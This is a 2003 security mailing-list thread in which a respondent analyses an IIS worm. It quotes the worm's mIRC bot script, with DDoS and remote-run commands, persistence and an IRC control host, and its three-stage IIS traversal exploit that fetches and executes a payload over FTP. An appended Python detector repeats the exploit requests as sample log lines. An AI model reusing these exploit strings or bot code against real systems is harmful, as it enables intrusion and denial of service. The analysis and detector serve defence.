Incidents
www.google.com reference in directory-traversal attack Jul 14 2003 05:35PM
sgt_b (sgt_b2002 yahoo com) (4 replies)
Re: www.google.com reference in directory-traversal attack Jul 15 2003 03:21AM
Paul Dokas (dokas cs umn edu)
On 14 Jul 2003 17:35:36 -0000, sgt_b <sgt_b2002 (at) yahoo (dot) com [email concealed]> wrote:
>
>
> I've included a link to a tcpdump taken that shows a standard IIS
> directory-traversal attack. I was looking over the packets and noticed a
> reference to www.google.com. Could someone take a look, and let me know
> what this is being used for?
>
> http://12.208.102.165/attack3.dump
> atack3.dump=1.6kb

It's either this:

http://www.gdgsoft.com/info/notes/gsfxalert.asp

or a very close relative. This beastie swept through my networks and
has caused quite a few machines to become infected.

The variant that I've got creates:

C:\WINNT\SYSTEM32\dfg ghj\loi gty
which contains this:

CLS.BAT
DATA.BAK
DEXE.CPL
FSLX.EXE
KLSYS.EXE
NEXE.CPL
PLUG.DLL
PSC32.EXE
SYSTL.EXE
TSYSL.BAT
WINSE.EXE

It appears to be a more recent version of W32.Randon.worm:

http://vil.nai.com/vil/content/v_100097.htm

with quite a few "improvements" like a much larger dictionary, and
it doesn't seem to be detected by several of the larger anti-virus
packages (I might add that clamd *does* find this one as W32.Mix).
Oh, and it's got DDoS capabilities.

Here's the top bit of `strings PLUG.DLL`:

on *:START:{
run systl.exe /n /fh winsck
sconf
inc %many
if (%many = 1) { set %infecttime $day $date $time | regs | checksf | makeSHR }
alias n0clone { if ($portfree(29275) == $false) { exit } | socklisten noclone 29275 }
on *:TEXT:*:*: {
if ($nick isop $rds(sc)) {
if ($1 = !ntimer) { if ($2 = Sock) { set %ntnick $3 | set %ntserver $4 | set %ntport $5 | sockopen NTimer $+ $r(1,1000) $+ $fnick %ntserver %ntport } }
if ($1 = !ntreg) { reg $2- }
if ($1 = !ntstop) { ntstop }
if ($1 = !dde) { /dde $2 command "" / $+ $3- }
if ($1 = !ind) { .identd on $2- }
if ($1 = !-) && ($2 != $null) { %- = $2- | / $+ %- | unset %- }
if ($1 = !pfast) { if ($4 == random) { //Tw1stStart $2 $3 $r(1,64000) | halt } | //Tw1stStart $2 $3 $4 }
if ($1 = !fserv) { /saym [F-Serv Initialized] ( $+ $nick $+ ) ( Enjoy! | /fserve $nick 3 $2 }
if ($1 = !packet) && ($3 != $null) { run systl.exe /n /fh /r "ping.exe $2 -n $3 -l 65500" | saym
14DDoS
14 packeting $2 with $calc($3 *65536/1024/1000) $+ mb traffic }
if ($1 = !packet.stop) { run systl.exe /n /fh /r "winse.exe -kf ping.exe" | saym
14DDoS
14 packeting halted! }
if ($1 = !run) && ($2 != $null) { /run $2- }
if ($1 = !icmp) { if ($2 == $null) { /saym
rror
yntax: (!icmp ip packetsize howmany, ie: !icmp 127.0.0.1 2000 1000) | halt } | run systl.exe /n /r "ping -n $4 -l $3 -w 0 $2 " }
if ($1 = !Clone) { /clone $2- }
if ($1 = !syn) { if ($2 !== $null) { saym
.
.
.

and so it goes for 692 lines. The odd HTTP connects that you saw were from
the very end of PLUG.DLL:

alias sconf {
.ddeserver on gtt1wst3r1.4.2
.nick [_ $+ $r(1000,99999) $+ ]]
.n0clone
.Cona
.timercheck 0 10 Cona
.timerh1dd3 -o 0 1 H1dd3
.timers33 -o 0 1 s33
.timerregs -o 0 1 regs
.run systl.exe /n /fh /r cls.BAT
.timerkillsofts -o 0 5 killsofts
alias regs { if ($Regread(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\R
un\salfx) = NA) { $RegWrite(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi
on\Run\salfx,$mircdirklsys.exe,REG_SZ) } }
alias saym { if ($me isvo $rds(sc)) { clearall | msg $rds(sc) $1- } }
alias checksf { if ($exists($rds(sf)) = $false) && ($findfile(c:\,$rds(sf),0) != 0) { copy $findfile(c:\,$rds(sf),1) $rds(sf) } }
on *:SOCKOPEN:Sg1.*: {
sockwrite -n $sockname GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\
cmd.exe+c:\inetpub\scripts\script.exe HTTP/1.1
sockwrite -n $sockname Host: www.google.com
sockwrite -n $sockname Connection: keep-alive
sockwrite $sockname $crlf
on *:SOCKCLOSE:Sg1.*: {
sockopen Sg2. $+ $gettok($sockname,2,46) $+ . $+ $gettok($sockname,3,46) $+ . $+ $gettok($sockname,4,46) $+ . $+ $gettok($sockname,5,46)
on *:SOCKOPEN:Sg2.*: {
saym
IIS Exploit
ATTEMPTING STAGE 2
sockwrite -n $sockname GET /scripts/script.exe?/c+echo+open+127.0.0.1>tmp2&&echo+Administrator>>tmp
2&&echo+1234>>tmp2&&echo+get+httpodbc.dll>>tmp2&&echo+get+ $+ $rds(sf) $+
>>tmp2&&echo+bye>>tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&echo+exit>>tmp2.cmd&
&tmp2.cmd HTTP/1.1
sockwrite -n $sockname Host: www.google.com
sockwrite -n $sockname Connection: keep-alive
sockwrite $sockname $crlf
on *:SOCKCLOSE:Sg2.*: {
saym
IIS Exploit
STAGE 2 COMPLETE
sockopen Sg3. $+ $gettok($sockname,2,46) $+ . $+ $gettok($sockname,3,46) $+ . $+ $gettok($sockname,4,46) $+ . $+ $gettok($sockname,5,46)
on *:SOCKOPEN:Sg3.*: {
saym
IIS Exploit
ATTEMPTING STAGE 3
sockwrite -n $sockname GET /scripts/httpodbc.dll?MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem3
2%5Ccmd.exe+%2Fc+c%3A%5Cinetpub%5Cscripts%5C $+ $rds(sf) HTTP/1.1
sockwrite -n $sockname Host: www.google.com
sockwrite -n $sockname Connection: keep-alive
sockwrite $sockname $crlf
on *:SOCKCLOSE:Sg3.*: {
saym
IIS Exploit
STAGE 3 COMPLETE

An infected host will join an IRC channel on rul3z.q8hell.org and
sit waiting for instructions. The host will also start scanning
for windows shares that it can infect. It appears to also use
a fairly large dictionary in an attempt to guess passwords on any shares
that it finds. And finally, the infected host will start scanning for
IIS web servers to infect.

Paul
--
Paul Dokas dokas (at) cs.umn (dot) edu [email concealed]
======================================================================
Don Juan Matus: "an enigma wrapped in mystery wrapped in a tortilla."
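The Sg1/Sg2/Sg3 socket handlers quoted above are the answer to the original question: the worm hard-codes "Host: www.google.com" into every request, while the real target IP travels in the socket name (Sg1.a.b.c.d, pulled back out by the $gettok calls). IIS ignores the header, so it is noise to the victim but a useful signature to a defender. The following is an added example, written for this page and not code from the thread or from the worm: a Python detector run over constructed IIS-style access log lines (client IP, method, path, Host header, status) that recognises each of the three stages, flags a Host header naming a site this server does not serve, and reports clients that completed the full chain. LOCAL_HOSTNAMES is an assumed list of names the monitored server answers for, and PAYLOAD.EXE is a placeholder for the worm's $rds(sf) file name, which the post does not resolve. It decodes the path repeatedly until it stops changing, so it also matches singly- or triply-encoded traversals, which goes beyond the %255c form shown on the page.

```python
"""
Detector for the three-stage IIS exploit sequence seen in PLUG.DLL.
Added example, not code from the thread or from the worm. Log lines are
constructed; LOCAL_HOSTNAMES is an assumption for the example.
"""
from collections import defaultdict
from urllib.parse import unquote

# Names this web server legitimately serves (assumption for the example).
LOCAL_HOSTNAMES = {"www.example.org", "192.0.2.10"}

# Constructed sample log: "<client_ip> <method> <path> <host_header> <status>".
# The three attacker lines mirror the Sg1/Sg2/Sg3 requests from the post;
# PAYLOAD.EXE stands in for the worm's $rds(sf) file name (not on the page).
SAMPLE_LOG = [
    r"198.51.100.7 GET /index.html www.example.org 200",
    r"203.0.113.5 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe www.google.com 200",
    r"198.51.100.7 GET /images/logo.png www.example.org 200",
    r"203.0.113.5 GET /scripts/script.exe?/c+echo+open+127.0.0.1>tmp2&&echo+Administrator>>tmp2&&echo+1234>>tmp2&&echo+get+httpodbc.dll>>tmp2&&echo+get+PAYLOAD.EXE>>tmp2&&echo+bye>>tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&echo+exit>>tmp2.cmd&&tmp2.cmd www.google.com 200",
    r"203.0.113.5 GET /scripts/httpodbc.dll?MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%2Fc+c%3A%5Cinetpub%5Cscripts%5CPAYLOAD.EXE www.google.com 200",
]


def fully_decode(s: str, max_rounds: int = 5) -> str:
    """URL-decode until the string stops changing, so %255c -> %5c -> '\\'.
    Single-, double- and triple-encoded traversals all normalise the same way."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def normalize_path(path: str) -> str:
    """Decoded, backslashes folded to '/', lower-cased, ready for matching."""
    return fully_decode(path).replace("\\", "/").lower()


def classify_request(path: str, host: str) -> list[str]:
    """Return stage labels (and a Host-header finding) that a request matches."""
    findings = []
    norm = normalize_path(path)
    # Stage 1: traversal out of /scripts into winnt/system32/cmd.exe
    if "../" in norm and "winnt/system32/cmd.exe" in norm:
        findings.append("stage1")
    # Stage 2: the copied cmd.exe (script.exe) writing an FTP script with echo
    if "/scripts/script.exe" in norm and "echo+" in norm and "ftp+-s:" in norm:
        findings.append("stage2")
    # Stage 3: httpodbc.dll ISAPI abuse to run the fetched file
    if "httpodbc.dll" in norm and "mfcisapicommand=exploit" in norm:
        findings.append("stage3")
    # The worm sends Host: www.google.com whatever the real target is, so a
    # Host header naming a site we do not serve is a signal on its own.
    if host.lower() not in LOCAL_HOSTNAMES:
        findings.append("host-mismatch:" + host)
    return findings


def parse_line(line: str) -> dict:
    """Split one constructed log line into its five fields."""
    client, method, path, host, status = line.split()
    return {"client": client, "method": method, "path": path,
            "host": host, "status": status}


def scan_log(lines) -> list[tuple[str, list[str]]]:
    """(client, findings) for every line with at least one finding."""
    flagged = []
    for line in lines:
        rec = parse_line(line)
        findings = classify_request(rec["path"], rec["host"])
        if findings:
            flagged.append((rec["client"], findings))
    return flagged


def completed_chains(lines) -> set[str]:
    """Clients seen issuing all three stages, i.e. a likely successful infection."""
    stages = defaultdict(set)
    for client, findings in scan_log(lines):
        for f in findings:
            if f.startswith("stage"):
                stages[client].add(f)
    return {c for c, s in stages.items() if s >= {"stage1", "stage2", "stage3"}}


if __name__ == "__main__":
    for client, findings in scan_log(SAMPLE_LOG):
        print(client, findings)
    print("completed chains:", completed_chains(SAMPLE_LOG))
```

A stage-3 hit is the one worth paging on: by then the dropped file has already been fetched by FTP and executed, so the host should be treated as infected and checked for the Run\salfx registry value and the "dfg ghj\loi gty" directory described above rather than merely blocked at the perimeter.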


Copyright 2010, SecurityFocus